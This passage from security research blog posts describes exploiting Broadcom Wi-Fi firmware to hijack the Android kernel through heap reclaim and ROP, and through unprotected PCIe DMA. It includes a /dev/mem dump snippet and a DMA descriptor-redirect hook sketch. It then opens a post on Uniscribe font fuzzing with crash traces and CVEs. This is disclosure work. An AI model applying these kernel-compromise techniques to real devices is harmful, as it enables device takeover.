Moreover, while this idea might be nice in theory, it doesn’t quite work in practice. You see, calling kfree on an arbitrary address is not without side-effects of its own. For starters, the page containing the memory address must be marked as either a “slab” page, or as “compound”. This only holds true (in general) for pages actually used by the slab allocator. Trying to call kfree on an address in a page that isn’t marked as such, triggers a kernel panic (thereby crashing the device).
Perhaps, instead, we can choose to ignore the other constraints and focus on the kfree? Indeed, if we are able to consistently locate an allocation whose data can be used for the purpose of the exploit, we could attempt to free that memory address, and then “re-capture” it by using our heap shaping primitive. However, this raises several additional questions. First, will we be able to consistently locate a slab-resident address? Second, even if we were to find such an address, surely it will be associated with a per-CPU cache, meaning that freeing it will not necessarily allow us to reclaim it later on. Lastly, whichever allocation we do choose to target, will have to satisfy the constraints above - that is, the first four bytes must be zero, and the 7th byte will be modified to match the 6th.
However, this is where some slight trickery comes in handy! Recall that kmalloc holds a number of fixed-size caches. Yet what should happen when a larger allocation is requested? It turns out that in that case, kmalloc simply grabs a number of consecutive free pages (using __get_free_pages) and returns them to the caller. This is done without any per-CPU caching. As such, if we are able to free a large allocation, we should then be able to reclaim it without having to consider which CPU allocated it in the first place.
This may solve the problem of affinity, but it still doesn’t help us locate these allocations. Unfortunately, the slab caches are allocated quite late in the kernel’s boot process, and their contents are very “noisy”. This means that even guessing a single address within a slab is quite difficult, even more so for remote attackers. However, early allocations which use the large allocation flow (that is, which are created using __get_free_pages) do consistently inhabit the same memory addresses! This is as long as they occur early enough during the kernel’s initialisation so that no non-deterministic events happen concurrently.
Combining these two facts, we can search for a large early allocation. After tracing the large allocation path and rebooting the kernel, it seems that there are indeed quite a few such allocations. To help navigate this large trace, we can also compile the Linux kernel with a special GCC plugin that outputs the size of each structure used in the kernel. Using these two traces, we can quickly navigate the early large allocations, and try and search for a potential match.
After going over the list, we come across one seemingly interesting entry:

Putting It All Together
During the bcmdhd driver’s initialisation, it calls the wiphy_new function in order to allocate an instance of wl_priv. This instance is used to hold much of the metadata related to the driver’s operation. But there’s one more sneaky little piece of data hiding within this structure - the event handler function pointer array used to handle incoming event frames! Indeed, the very same table we were discussing earlier on (evt_handler), is stored within this object. This leads us to a direct path for exploitation - simply kfree this object, then send an SWC event frame to reclaim it, and fill it with our own arbitrary data.
Before we can do so, however, we’ll need to make sure that the object satisfies the constraints mandated by the processing function. Namely, the first four bytes must be zero, and we must be able to modify the 7th byte to match the value of the 6th byte. While the second constraint poses no issue at all, the first constraint turns out to be quite problematic! As it happens, the first four bytes are not zero, but in fact point to a block of function pointers related to the driver. Does this mean we can’t use this object after all?
No - as luck would have it, we can still use one more trick! It turns out that when kfree-ing a large allocation, the code path for kfree doesn’t require the passed in pointer to point to the beginning of the allocation. Instead, it simply fetches the pages corresponding to the allocation, and frees them instead. This means that by specifying an address located within the structure that does match the constraints, we’ll be able to both satisfy the requirements imposed by the processing function and free the underlying object. Great.
Putting this all together, we can now simply send along a SWC event frame in order to reclaim the evt_handler function pointer array, and populate it with our own contents. As there is no KASLR, we can search for a stack pivot gadget in the kernel image that will allow us to gain code execution. For the purpose of the exploit, I’ve chosen to replace the event handler for WLC_E_SET_SSID with a stack pivot into the event frame itself (which is stored in R2 when the event handler is executed). Lastly, by placing a ROP stack in a crafted event frame of type WLC_E_SET_SSID, we can now gain control over the kernel thread’s execution, thus completing our exploit.

You can find a sample exploit for this vulnerability here. It includes a short ROP chain that simply calls printk. The exploit was built against a Nexus 5 with a custom kernel version. In order to modify it to work against different kernel versions, you’ll need to fill in the appropriate symbols (under symbols.py). Moreover, while the primitives are still present in 64-bit devices, there might be additional work required in order to adjust the exploit for those platforms.
With that, let’s move on to the second part of the blog post!

Part 2 - The “Easy” Way

How Low Can You Go?
Although we’ve seen that the high-level communication protocols between the Wi-Fi firmware and the host may be compromised, we’ve also seen how tedious it might be to write a fully-functional exploit. Indeed, the exploit detailed above required sufficient information about the device being targeted (such as symbols). Furthermore, any mistake during the exploitation might cause the kernel to crash; thereby rebooting the device and requiring us to start all over again. This fact, coupled with our transient control over the Wi-Fi SoC, makes exploit chains of this type harder to execute reliably.
That said, up until now we’ve only considered the high-level attack surface exposed to the firmware. In effect, we were thinking of the Wi-Fi SoC and the application processor as two distinct entities which are completely isolated from one another. In reality, we know that nothing could be further from the truth. Not only are the Wi-Fi SoC and the host physically proximate to one another, they also share a physical communication interface.
As we’ve seen before, Broadcom manufactures SoCs that support various interfaces, including SDIO, USB and even PCIe. While the SDIO interface used to be quite popular, in recent years it has fallen out of favour in mobile devices. The main reason for the “disappearance” of SDIO is due to its limited transfer speeds. As an example, Broadcom’s BCM4339 SoC supports SDIO 3.0, a fairly advanced version of SDIO. Nonetheless, it is still limited to a theoretical maximal bus speed of 104 MB/s. On the other hand, 802.11ac has a theoretical maximal speed of 166 MB/s - much more than SDIO can cope with.

BCM4339 Block Diagram
The increased transfer rates caused PCIe to become the most prevalent interface used to connect Wi-Fi SoCs in modern mobile devices. PCIe, unlike PCI, is based on a point-to-point topology. Every device has its own serial link connecting it to the host. Due to this design, PCIe enjoys much higher transfer rates per lane than the equivalent rates on PCI (since bus access doesn’t need to be arbitrated); PCIe 1.0 has a throughput of 250 MB/s on a single lane (scaling linearly with the number of lanes).
More concretely, let’s take a look at the adoption rate of PCIe in modern mobile devices. Taking Nexus phones as a case study, it seems that since the Nexus 6, all devices use a PCIe interface instead of SDIO. Much in the same way, all iPhones since the iPhone 6 use PCIe (whereas old iPhones used USB to connect to the Wi-Fi SoC). Lastly, all Samsung flagships since the Galaxy S6 use PCIe.

Interface Isolation
So why is this information relevant to our pursuits? Well, PCIe is significantly different to SDIO and USB in terms of isolation. Without going into the internals of each of the interfaces, SDIO simply allows the serial transfer of small command “packets” (on the CMD pin), potentially accompanied by data (on the DATA pins). The SDIO controller then decodes the command and responds appropriately. While SDIO may support DMA (for example, the host can set up a DMA engine to continually read data from the SD bus and transfer it to memory), this feature is not used on mobile devices, and is not an inherent part of SDIO. Furthermore, the low-level SDIO communication on the BCM SoC is handled by the “SDIOD” core. In order to craft special SDIO commands, we would most likely need to gain access to this controller first.
Likewise, USB (up to version 3.1) does not include support for DMA. The USB protocol is handled by the host’s USB controller, which performs the necessary memory access required. Of course, it might be possible to compromise the USB controller itself, and use its interface to the memory system in order to gain memory access. For example, on the Intel Hub Architecture, the USB controller connects to the PCH via PCI, which is capable of DMA. But once again, this kind of attack is rather complex, and is limited to specific architectures and USB controllers.
In contrast to these two interfaces, PCIe allows for DMA by design. This allows PCIe to operate at great speeds without incurring a performance hit on the host. Once data is transferred to the host’s memory, an interrupt is fired to indicate that work needs to be done.
On the transaction layer, PCIe operates by sending small bundles of data, appropriately named “Transaction Layer Packets” (TLPs). Each TLP may be routed by a network of switches, until it reaches the destined peripheral. There, the peripheral decodes the packet and performs the requested memory operation. The TLP’s header encodes whether this is a requested read or write operation, and its body contains any accompanying data related to the request.
Structure of a Transaction Layer Packet (TLP)

IOU an MMU
While PCIe enables DMA by design, that still doesn’t imply that any PCIe connected peripheral should be able to freely access any memory address on the host. Indeed, modern architectures defend themselves against DMA-capable peripherals by including additional memory mapping units (IOMMUs) on the IO buses connecting the peripherals to main memory.
ARM specifies its own version of an IOMMU, called the “System Memory Mapping Unit” (SMMU). Among other roles, the SMMU is used in order to manage the memory view exposed to different SoC components. In short, each stream of memory transactions is associated with a “Stream ID”. The SMMU then performs a step called “context determination” in order to translate the Stream ID to the corresponding memory context.
Using the memory context, the SMMU is then able to associate the memory operations with the translation table containing the mappings for the requesting device. Much like a regular ARM MMU, the translation tables are queried in order to translate the input address (either a virtual address or an intermediate physical address) to the corresponding physical address. Of course, along the way the SMMU also ensures that the requested memory operation is, in fact, allowed. If any of these steps fails, a fault is generated.

While this is all well and good in theory, it still doesn’t mean that an SMMU is, in fact, used in practice. Unfortunately, mobile SoCs are proprietary, so it would be hard to determine how and where SMMUs are actually in place. That said, we can still glean some insight from publicly available information. For example, by going over the IOMMU bindings in the Linux Kernel, we can see that apparently both Qualcomm and Samsung have their own proprietary implementations of an SMMU (!), with their own unique device-tree bindings. However, suspiciously, it seems that the device tree entries for the Broadcom Wi-Fi chip are missing these IOMMU bindings…
Perhaps, instead, Broadcom’s host driver (bcmdhd) manually configures the SMMUs before each peripheral memory access? In order to answer this question, we’ll need to take a closer look at the driver’s implementation of the communication protocol used over PCIe. Broadcom implements their own proprietary protocol called “MSGBUF” in order to communicate with the Wi-Fi chip over PCIe. The host’s implementation of the protocol and the code for handling PCIe can be found under dhd_msgbuf.c and dhd_pcie.c, respectively.
After going through the code, we gain a few key insights into the communication protocol’s inner workings. First, as expected, the driver scans the PCIe interface, accesses the PCI configuration space, and maps all the shared resources into the host’s memory. Next, the host allocates a set of “rings”. Each ring is backed by a DMA-coherent memory region. The MSGBUF protocol uses four rings for data flow, and one ring for control. Each data path (either RX or TX), has two corresponding rings - one to signal the submission of a request, and another to indicate its completion. Yet, there still doesn’t seem to be any reference to an SMMU in the driver so far. Perhaps we have to dig deeper...
So how does the Wi-Fi chip learn about the location of these rings? After all, so far they’re just a bunch of physically contiguous buffers allocated in the driver. Going over the driver’s code, it appears that the host and the chip hold a shared structure, pciedev_shared_t, containing all the PCIe-related metadata, including the location of each of the ring buffers. The host holds its own copy of this structure, but where does the Wi-Fi SoC keep its copy? According to the dhdpcie_readshared function, it appears that the Wi-Fi chip stores a pointer to this structure in the last four bytes of its RAM.

Let’s go ahead and take a look at the structure’s contents. To make this process slightly easier, I’ve written a small script that takes a firmware RAM snapshot (produced using dhdutil), reads the pointer to the PCIe shared structure from the end of RAM, and dumps out the relevant information:

Following the rings_info_ptr field, we can also dump the information about each of the rings - including their size, current index, and physical memory address:


For starters, we can see that the memory addresses specified in these buffers seem to be, in fact, physical memory addresses from the host’s memory. This is slightly suspicious… In the presence of an SMMU, the chip could have used an entirely different address range (which would have then been translated by the SMMU into physical addresses). However, merely being suspicious is not enough... To check whether or not an SMMU is present (or active), we’ll need to set up a small experiment!
Recall that the MSGBUF protocol uses the aforementioned ring buffers to indicate submission and completion of events, for both the RX and the TX paths. In essence, during transmission of a frame, the host writes to the TX submission ring. Once the chip transmits the frame, it writes to the TX completion ring to indicate as such. Similarly, when a frame is received, the firmware writes to the RX submission ring, and the host subsequently writes to the RX completion ring upon reception of the frame.
If so, what if we were to modify the ring address corresponding to TX completion ring in the firmware’s PCIe metadata structure, and point it at an arbitrary memory address? If an SMMU is in place and the chosen memory address is not mapped-in for the Wi-Fi chip, the SMMU will generate a fault and no modification will take place. However, if there is no SMMU in place, we should be able to observe this modification by simply dumping the corresponding physical memory range from the host (for example, by using /dev/mem). This small experiment also allows us to avoid reverse-engineering the Wi-Fi firmware’s implementation of the MSGBUF protocol for the time being, which would no doubt be quite tedious.
To make things more interesting, let’s modify the TX completion ring’s address to point at the beginning of the Linux Kernel’s code segment (0x80000 on the Nexus 6P; see /proc/iomem). After generating some Wi-Fi traffic and inspecting the contents of physical memory, we are presented with the following result:


Aha! The Wi-Fi chip managed to DMA into the physical address range containing the host’s kernel, without any interference! This finally confirms our suspicion: either there is no SMMU present, or it isn’t configured to prevent the chip from accessing the host’s RAM.
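The host-side check itself is only a few lines. A sketch follows (run as root, and assuming the kernel permits /dev/mem access to this range; the physical address is device-specific):

#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>

/* Dump the first bytes of the kernel's code segment from /dev/mem to
 * check whether the Wi-Fi chip managed to DMA over it. */
#define KERNEL_PHYS 0x80000UL /* Nexus 6P; see /proc/iomem */

int main(void)
{
  int fd = open("/dev/mem", O_RDONLY);
  if (fd < 0) { perror("open"); return 1; }

  /* mmap offsets must be page-aligned; KERNEL_PHYS already is here. */
  uint8_t *p = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, fd, KERNEL_PHYS);
  if (p == MAP_FAILED) { perror("mmap"); return 1; }

  for (int i = 0; i < 64; i++)
    printf("%02x%s", p[i], (i % 16 == 15) ? "\n" : " ");

  munmap(p, 0x1000);
  close(fd);
  return 0;
}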
Not only does this kind of access not require a single vulnerability, but it is also much more reliable to exploit. There’s no need for the exact kernel symbols, or any other preliminary information. The Wi-Fi SoC can simply use its DMA access to scan the physical address ranges in order to locate the kernel. Then, it can identify the kernel’s symbol table in RAM, analyse it to locate any kernel function it wishes, and proceed to hijack the function by overwriting its code (one such example can be seen in this similar DMA-like attack). All in all, this style of attack is completely portable and 100% reliable -- a significant step-up from the previous exploit we saw.
Although we could stop here, let’s make one additional small effort in order to get slightly better control over this primitive. While we are able to DMA into the host’s memory, we are doing so rather “blindly” at this point. We do not control the data being written, but instead rely on the Wi-Fi firmware’s implementation of the MSGBUF protocol to corrupt the host’s memory. By delving slightly further, we should be able to figure out how the DMA engine on the Wi-Fi chip works, and manually utilise it to access the host’s memory (instead of relying on side-effects, as shown above).
So where do we start? Searching for the “MSGBUF” string, we can see some initialisation routines related to the protocol, which are part of the special “reclaim” region (and are therefore only used during the chip’s initialisation). Nevertheless, reverse-engineering these functions reveals that they reference a set of functions in the Wi-Fi chip’s RAM. Luckily, some of these functions’ names are present in the ROM! Their names seem quite relevant: “dma64_txfast”, “dma64_txreset” - it seems like we’re on the right track.
Once again, we are spared some reverse-engineering effort. Broadcom’s SoftMAC driver, brcmsmac, contains the implementation for these exact functions. Although we can expect some differences, the general idea should remain the same.
Combing through the code, it appears that for every DMA-capable source or sink, there exists a corresponding DMA metadata structure, called “dma_info”. This structure contains pointers to the DMA RX and TX registers, as well as the DMA descriptor rings into which the DMA source or destination addresses are inserted. Additionally, each structure is assigned an 8-byte name which can be used to identify it. What’s more, every dma_info structure begins with a pointer to the RAM function block containing the DMA functions - the same block we identified earlier. Therefore, we can locate all instances of these DMA metadata structures by simply searching for this pointer in the Wi-Fi SoC’s RAM.
Now that we know the format of these metadata structures and have a means to locate them, we can try and search for the instance corresponding to the DMA TX path from the Wi-Fi chip to the host.
Unfortunately, this is easier said than done. After all, we can expect to find multiple instances of these structures, as the Wi-Fi chip performs DMA to and from many sources and sinks. For example, the firmware likely uses SoC-internal DMA engines to access the internal RX and TX FIFOs. So how can we identify the correct DMA descriptor?
Recall that each descriptor has an associated “name” field. Let’s search for all the DMA descriptors in RAM (by searching for the DMA function block pointer), and output the corresponding name for each instance:
Found dma_info - Address: 0x00220288, Name: "wl0"
Found dma_info - Address: 0x00220478, Name: "wl0"
Found dma_info - Address: 0x00220A78, Name: "wl0"
Found dma_info - Address: 0x00221078, Name: "wl0"
Found dma_info - Address: 0x00221BF8, Name: "wl0"
Found dma_info - Address: 0x0022360C, Name: "wl0"
Found dma_info - Address: 0x00236268, Name: "D2H"
Found dma_info - Address: 0x00238B7C, Name: "H2D"
Great! While there are a few nondescript dma_info instances which are probably used internally (as suspected), there are also two instances which seem to correspond to host-to-device (H2D) and device-to-host (D2H) DMA accesses. Since we’re interested in DMA-ing into the host’s memory, let’s take a closer look at the D2H structure:

Note that the RX and TX registers point to an area outside the Wi-Fi firmware’s ROM and RAM. In fact, they point to backplane addresses corresponding to the DMA engine’s registers. In contrast, the RX and TX descriptor ring pointers do, indeed, point to memory locations within the SoC’s RAM.
By going over the DMA code in brcmsmac and the MSGBUF protocol implementation in the host’s driver, we are able to finally piece together the details. First, the host posts physical addresses (corresponding to SKBs) to the chip, using the MSGBUF protocol. These addresses are then inserted into the DMA descriptor rings by the firmware’s MSGBUF implementation. Once the rings are populated, the Wi-Fi chip simply writes to the backplane registers in order to “kick off” the DMA engine. The DMA engine will then go over the descriptor list, and consume the descriptor at the current ring index for the DMA access. Once a DMA descriptor is consumed, its value is set to a special “magic” value (0xDEADBEEF).
Therefore, all we need to do in order to manipulate the DMA engine into writing into our own arbitrary physical address is to modify the DMA descriptor ring. Since the MSGBUF protocol is constantly operating as frames are being sent back and forth, the descriptor rings change rapidly. It would be useful if we could “hook” one of the functions called during the DMA TX flow, allowing us to quickly replace the current descriptors with our own crafted values.
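Conceptually, the descriptor-rewriting stub would do something like the following sketch (rendered in C for readability; the descriptor layout, the field holding the 0xDEADBEEF marker and the ring size are all assumptions about the real engine):

#include <stdint.h>

/* Sketch of the D2H hook: walk the RX descriptor ring and point every
 * live (non-consumed) descriptor at our chosen host physical address. */
#define CONSUMED_MAGIC 0xDEADBEEF
#define RING_SIZE      64 /* assumed ring length */

struct dma64_desc {
  uint32_t ctrl1;
  uint32_t ctrl2;
  uint32_t addr_lo; /* low 32 bits of the host physical address */
  uint32_t addr_hi; /* high 32 bits                             */
};

void redirect_d2h_descriptors(struct dma64_desc *ring, uint64_t target_pa)
{
  for (int i = 0; i < RING_SIZE; i++) {
    if (ring[i].addr_lo == CONSUMED_MAGIC)
      continue; /* already consumed by the engine */
    ring[i].addr_lo = (uint32_t)target_pa;
    ring[i].addr_hi = (uint32_t)(target_pa >> 32);
  }
}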
As luck would have it, while the dma64_txfast function is located in ROM, its prologue starts with a branch into RAM. This allows us to use our patcher from the previous blog post in order to hook the function, and execute our own shellcode stub. Let’s write a small stub along the lines of the sketch above, which simply goes over the D2H DMA descriptors and changes every non-consumed descriptor to our own pointer. By doing so, subsequent calls to the DMA engine should write the received frame’s contents into the aforementioned address. After applying the patch and generating Wi-Fi traffic, we are greeted with the following result:

Ah-ha! We managed to DMA arbitrary data into an address of our choosing. Using this primitive, we can finally hijack any kernel function with our own crafted data.
Lastly - the experiment described above was performed on a Nexus 6P, which is based on Qualcomm’s Snapdragon 810 SoC. This raises the question: perhaps different SoCs exhibit different behaviour? To test out this theory, let’s repeat the same experiment on a Galaxy S7 Edge, which is based on Samsung’s Exynos 8890 SoC.
Using a previously disclosed privilege escalation to inject code into system_server, we can directly issue the ioctls required to interact with the bcmdhd driver, thus replacing the chip memory access capabilities provided by dhdutil in the above experiment. Similarly, using a previously disclosed kernel exploit, we are able to execute code within the kernel, allowing us to observe changes to the kernel’s code segments.
Putting this together, we can extract the Wi-Fi chip’s (BCM43596) ROM, inspect it, and locate the DMA function as described above. Then, we can insert the same hook; pointing any non-consumed DMA RX descriptors at the kernel code’s physical address. After installing the hook and generating some Wi-Fi traffic, we observe the following result:

Once again we are able to DMA freely into the kernel (bypassing RKP’s protection along the way)! It seems that both Samsung’s Exynos 8890 SoC and Qualcomm’s Snapdragon 810 either lack SMMUs or fail to utilise them.

Afterword
In conclusion, we’ve seen that the isolation between the host and the Wi-Fi SoC can, and should, be improved. While flaws exist in the communication protocols between the host and the chip, these can eventually be solved over time. However, the current lack of protection against a rogue Wi-Fi chip leaves much to be desired.
Since mobile SoCs are proprietary, it remains unknown whether current-gen SoCs are capable of facilitating such isolation. We hope that SoCs that do, indeed, have the capability to enable memory protection (for example, by means of an SMMU), choose to do so soon. For the SoCs that are incapable of doing so, perhaps this research will serve as a motivator when designing next-gen hardware.
The current lack of isolation can also have some surprising side effects. For example, Android contexts which are able to interact with the Wi-Fi firmware can leverage the Wi-Fi SoC’s DMA capability in order to directly hijack the kernel. Therefore, these contexts should be thought of as being “as privileged as the kernel”, an assumption which I believe is not currently made by Android’s security architecture.
The combination of an increasingly complex firmware and Wi-Fi’s incessant onwards march, hint that firmware bugs will probably be around for quite some time. This hypothesis is supported by the fact that even a relatively shallow inspection of the firmware revealed a number of bugs, all of which were exploitable by remote attackers.
While memory isolation on its own will help defend against a rogue Wi-Fi SoC, the firmware’s defenses can also be bolstered against attacks. Currently, the firmware lacks exploit mitigations (such as stack cookies), and doesn’t make full use of the existing security mechanisms (such as the MPU). Hopefully, future versions are able to better defend against such attacks by implementing modern exploit mitigations and utilising SoC security mechanisms.
Categories: Security

Notes on Windows Uniscribe Fuzzing

Mon, 04/10/2017 - 10:25
Posted by Mateusz Jurczyk of Google Project Zero
Among the total of 119 vulnerabilities with CVEs fixed by Microsoft in the March Patch Tuesday a few weeks ago, there were 29 bugs reported by us in the font-handling code of the Uniscribe library. Admittedly the subject of font-related security has already been extensively discussed on this blog both in the context of manual analysis [1][2] and fuzzing [3][4]. However, what makes this effort a bit different from the previous ones is the fact that Uniscribe is a little-known user-mode component, which had not been widely recognized as a viable attack vector before, as opposed to the kernel-mode font implementations included in the win32k.sys and ATMFD.DLL drivers. In this post, we outline a brief history and description of Uniscribe, explain how we approached at-scale fuzzing of the library, and highlight some of the more interesting discoveries we have made so far. All the raw reports of the bugs we’re referring to (as they were submitted to Microsoft), together with the corresponding proof-of-concept samples, can be found in the official Project Zero bug tracker [5]. Enjoy!

Introduction

It was November 2016 when we started yet another iteration of our Windows font fuzzing job (whose architecture was thoroughly described in [4]). At that point, the kernel attack surface was mostly fuzz-clean with regards to the techniques we were using, but we still like to play with the configuration and input corpus from time to time to see if we can squeeze out any more bugs with the existing infrastructure. What we ended up with several days later was a bunch of samples which supposedly crashed the guest Windows system running inside of Bochs. When we fed them to our reproduction pipeline, none of the bugchecks occurred again, for unclear reasons. As disappointing as that was, there was also one interesting and unexpected result: for one of the test cases, the user-mode harness crashed itself, without bringing the whole OS down at the same time. This could indicate either that there was a bug in our code, or that there was some unanticipated font parsing going on in ring-3. When we started digging deeper, we found out that the unhandled exception took place in the following context:
(4464.11b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0933d8bf ebx=00000000 ecx=09340ffc edx=00001b9f esi=0026ecac edi=00000009
eip=752378f3 esp=0026ec24 ebp=0026ec2c iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
USP10!ScriptPositionSingleGlyph+0x28533:
752378f3 668b4c5002      mov     cx,word ptr [eax+edx*2+2] ds:002b:09340fff=????
Until that moment, we didn’t fully realize that our tools were triggering any font-handling code beyond the well-known kernel implementation (despite some related bugs having been publicly fixed in the past, e.g. CVE-2016-7274 [6]). As a result, the fuzzing system was not prepared to catch user-mode faults, and thus any such crashes had remained completely undetected in favor of system bugchecks, which caused full machine restarts.
We quickly determined that the usp10.dll library corresponded to “Uniscribe Unicode script processor” (in Microsoft’s own words) [7]. It is a relatively large module (600-800 kB depending on system version and bitness) responsible for rendering Unicode-encoded text, as the name suggests. From a security perspective, it’s important that the code base dates back to Windows 2000, and includes a C++ implementation of the parsing of various complex TrueType/OpenType structures, in addition to what is already implemented in the kernel. The specific tables that Uniscribe touches on are primarily Advanced Typography Tables (“GDEF”, “GSUB”, “GPOS”, “BASE”, “JSTF”), but also “OS/2”, “cmap” and “maxp” to some extent. What’s equally significant is that the code can be reached simply by calling the DrawText [8] or other equivalent API with Unicode-encoded text and an attacker-controlled font. Since no special calls other than the typical ones are necessary to execute the most exposed areas of the library, it makes for a great attack vector in applications which use GDI to render text with fonts originating from untrusted sources. This is also evidenced by the stack trace of the original crash, and the fact that it occurred in a program which didn’t include any usp10-specific code:
0:000> kb
ChildEBP RetAddr
0026ec2c 09340ffc USP10!otlChainRuleSetTable::rule+0x13
0026eccc 0133d7d2 USP10!otlChainingLookup::apply+0x7d3
0026ed48 0026f09c USP10!ApplyLookup+0x261
0026ef4c 0026f078 USP10!ApplyFeatures+0x481
0026ef98 09342f40 USP10!SubstituteOtlGlyphs+0x1bf
0026efd4 0026f0b4 USP10!SubstituteOtlChars+0x220
0026f250 0026f370 USP10!HebrewEngineGetGlyphs+0x690
0026f310 0026f370 USP10!ShapingGetGlyphs+0x36a
0026f3fc 09316318 USP10!ShlShape+0x2ef
0026f440 09316318 USP10!ScriptShape+0x15f
0026f4a0 0026f520 USP10!RenderItemNoFallback+0xfa
0026f4cc 0026f520 USP10!RenderItemWithFallback+0x104
0026f4f0 09316124 USP10!RenderItem+0x22
0026f534 2d011da2 USP10!ScriptStringAnalyzeGlyphs+0x1e9
0026f54c 0000000a USP10!ScriptStringAnalyse+0x284
0026f598 0000000a LPK!LpkStringAnalyse+0xe5
0026f694 00000000 LPK!LpkCharsetDraw+0x332
0026f6c8 00000000 LPK!LpkDrawTextEx+0x40
0026f708 00000000 USER32!DT_DrawStr+0x13c
0026f754 0026fa30 USER32!DT_GetLineBreak+0x78
0026f800 0000000a USER32!DrawTextExWorker+0x255
0026f824 ffffffff USER32!DrawTextExW+0x1e
As can be seen here, the Uniscribe functionality was invoked internally by user32.dll through the lpk.dll (Language Pack) library. As soon as we learned about this new attack vector, we jumped at the first chance to fuzz it. Most of the infrastructure was already in place, since user- and kernel-mode font fuzzing share a large number of pieces. The extra work we had to do was mostly related to filtering the input corpus, fiddling with the mutator configuration, adjusting the system configuration, and implementing logic for the detection of user-mode crashes (both in the test harness and the Bochs instrumentation). All of these steps are discussed in detail below. After a few days, we had everything working as planned, and after another couple, there were already over 80 crashes at unique addresses waiting for triage. Below is a summary of the issues that were found in the first fuzzing run and reported to Microsoft in December 2016.

Results at a glance

Since ~80 was still a fairly manageable number of crashes to triage manually, we tried to reproduce each of them by hand, deduplicating them and writing down their details at the same time. When we finished, we ended up with 8 separate high-severity issues that could potentially allow remote code execution:
Tracker ID | Memory access type at crash       | Crashing function                        | CVE
1022       | Invalid write of n bytes (memcpy) | usp10!otlList::insertAt                  | CVE-2017-0108
1023       | Invalid read / write of 2 bytes   | usp10!AssignGlyphTypes                   | CVE-2017-0084
1025       | Invalid write of n bytes (memset) | usp10!otlCacheManager::GlyphsSubstituted | CVE-2017-0086
1026       | Invalid write of n bytes (memcpy) | usp10!MergeLigRecords                    | CVE-2017-0087
1027       | Invalid write of 2 bytes          | usp10!ttoGetTableData                    | CVE-2017-0088
1028       | Invalid write of 2 bytes          | usp10!UpdateGlyphFlags                   | CVE-2017-0089
1029       | Invalid write of n bytes          | usp10!BuildFSM and nearby functions      | CVE-2017-0090
1030       | Invalid write of n bytes          | usp10!FillAlternatesList                 | CVE-2017-0072
All of the bugs but one were triggered through a standard DrawText call and resulted in heap memory corruption. The one exception was issue #1030, which resided in ScriptGetFontAlternateGlyphs, a documented Uniscribe-specific API function. The routine is responsible for retrieving a list of alternate glyphs for a specified character, and the interesting fact about the bug is that it wasn't a problem with operating on any internal structures. Instead, the function failed to honor the value of the cMaxAlternates argument, and could therefore write more output data to the pAlternateGlyphs buffer than was allowed by the function's caller. This meant that the buffer overflow was not specific to any particular memory type: depending on what pointer the client passed in, the overflow would take place on the stack, the heap or static memory. The exploitability of such a bug would greatly depend on the program's design and the compilation options used to build it. We must admit, however, that it is unclear what the real-world clients of the function are, and whether any of them would meet the requirements to become a viable attack target.
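To make the broken contract concrete, below is a hedged sketch of the client-side pattern this bug subverts; the MAKE_OT_TAG helper, the tag values and the surrounding state are our assumptions, not code from any known client:

#include <windows.h>
#include <usp10.h>

// usp10.h only defines OPENTYPE_TAG as a ULONG, so build tags by hand.
#define MAKE_OT_TAG(a,b,c,d) \
    ((OPENTYPE_TAG)((a) | ((b) << 8) | ((c) << 16) | ((d) << 24)))

// hdc/cache/analysis/glyph are assumed to come from earlier Script* calls.
void query_alternates(HDC hdc, SCRIPT_CACHE *cache,
                      SCRIPT_ANALYSIS *analysis, WORD glyph)
{
    WORD alternates[8];  // sized to match cMaxAlternates below...
    int count = 0;

    // ...but the vulnerable usp10.dll could write more than 8 entries to
    // alternates[], overflowing (in this example) the caller's stack.
    ScriptGetFontAlternateGlyphs(hdc, cache, analysis,
                                 MAKE_OT_TAG('l','a','t','n'),
                                 MAKE_OT_TAG('d','f','l','t'),
                                 MAKE_OT_TAG('a','a','l','t'),
                                 glyph, 8, alternates, &count);
}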
Furthermore, we extracted 27 unique crashes caused by invalid memory reads from non-NULL addresses, which could potentially lead to information disclosure of secrets stored in the process address space. Due to the large volume of these crashes, we were unable to analyze each of them in much detail or perform any advanced deduplication. Instead, we partitioned them by the top-level exception address, and filed all of them as a single entry #1031 in the bug tracker:
  1. usp10!otlMultiSubstLookup::apply+0xa8
  2. usp10!otlSingleSubstLookup::applyToSingleGlyph+0x98
  3. usp10!otlSingleSubstLookup::apply+0xa9
  4. usp10!otlMultiSubstLookup::getCoverageTable+0x2c
  5. usp10!otlMark2Array::mark2Anchor+0x18
  6. usp10!GetSubstGlyph+0x2e
  7. usp10!BuildTableCache+0x1ca
  8. usp10!otlMkMkPosLookup::apply+0x1b4
  9. usp10!otlLookupTable::markFilteringSet+0x1a
  10. usp10!otlSinglePosLookup::getCoverageTable+0x12
  11. usp10!BuildTableCache+0x1e7
  12. usp10!otlChainingLookup::getCoverageTable+0x15
  13. usp10!otlReverseChainingLookup::getCoverageTable+0x15
  14. usp10!otlLigCaretListTable::coverage+0x7
  15. usp10!otlMultiSubstLookup::apply+0x99
  16. usp10!otlTableCacheData::FindLookupList+0x9
  17. usp10!ttoGetTableData+0x4b4
  18. usp10!GetSubtableCoverage+0x1ab
  19. usp10!otlChainingLookup::apply+0x2d
  20. usp10!MergeLigRecords+0x132
  21. usp10!otlLookupTable::subTable+0x23
  22. usp10!GetMaxParameter+0x53
  23. usp10!ApplyLookup+0xc3
  24. usp10!ApplyLookupToSingleGlyph+0x6f
  25. usp10!ttoGetTableData+0x19f6
  26. usp10!otlExtensionLookup::extensionSubTable+0x1d
  27. usp10!ttoGetTableData+0x1a77

In the end, it turned out that these 27 crashes corresponded to 21 distinct bugs, which were fixed by Microsoft as CVE-2017-0083, CVE-2017-0091, CVE-2017-0092 and CVE-2017-0111 to CVE-2017-0128 in the MS17-011 security bulletin.
Lastly, we also reported 7 unique NULL pointer dereference issues with no deadline, in the hope that having any of them fixed would potentially enable our fuzzer to discover other, more severe bugs. On March 17th, MSRC responded that they had investigated the cases and concluded that they were low-severity DoS problems only, and would not be fixed as part of a security bulletin in the near future.

Input corpus, mutation configuration and adjusting the test harness

